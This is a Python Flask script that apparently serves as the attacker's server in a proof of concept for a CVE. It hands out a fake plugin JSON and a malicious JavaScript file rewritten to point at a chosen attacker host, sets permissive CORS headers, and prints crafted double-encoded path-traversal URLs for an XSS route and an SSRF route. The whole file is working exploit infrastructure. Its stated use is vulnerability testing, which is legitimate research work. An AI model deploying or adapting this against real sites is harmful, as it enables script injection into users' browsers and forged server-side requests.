from flask import Flask, jsonify, make_response, request
import json
import argparse

app = Flask(__name__)

# Global variable to hold the attacker-controlled host
attacker_host = "127.0.0.1:1234"  # Default, can be overridden via CLI


@app.route('/', defaults={'path': ''}, methods=["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS"])
@app.route('/<path:path>', methods=["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS"])
def serve_based_on_query(path):
    query_string = request.query_string.decode('utf-8')

    if request.method == 'OPTIONS':
        response = make_response('')
    else:
        if "p" in query_string:
            # Serve the fake plugin (data2.json)
            try:
                with open("data2.json") as f:
                    data = json.load(f)
                # Replace attacker.com with the supplied attacker_host in stringified JSON
                data_str = json.dumps(data).replace("attacker", attacker_host)
                response = make_response(data_str)
                response.headers['Content-Type'] = 'application/json'
            except Exception as e:
                response = make_response(f"Error reading data2.json: {e}", 500)

        elif "js" in query_string:
            # Serve the malicious JavaScript (js.js)
            try:
                with open("js.js") as f:
                    js_content = f.read().replace("attacker", attacker_host)
                response = make_response(js_content)
                response.headers['Content-Type'] = 'application/javascript'
            except Exception as e:
                response = make_response(f"Error reading js.js: {e}", 500)

        else:
            response = make_response("Attacker Server Failed", 400)

    # Add CORS headers
    response.headers['Access-Control-Allow-Origin'] = '*'
    response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, DELETE, PATCH, OPTIONS'
    response.headers['Access-Control-Allow-Headers'] = '*'

    return response


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Start malicious server for CVE testing.')
    parser.add_argument('--host', help='Hostname of the attacker', required=False, default=attacker_host)
    args = parser.parse_args()

    attacker_host = args.host
    print(f"[+] Using attacker host: {attacker_host}")
    
    print()
    print(f"[+] XSS Route: /a/..%2f..%2f..%2fpublic%2f..%252f%255C{attacker_host}%252f%253Fp%252f..%252f..%23/explore")
    print(f"[+] SSRF Route: /render/public/..%252f%5C{attacker_host}%252f%253F%252f..%252f..")
    print()
    
    app.run(host='0.0.0.0', port=1234, debug=False)
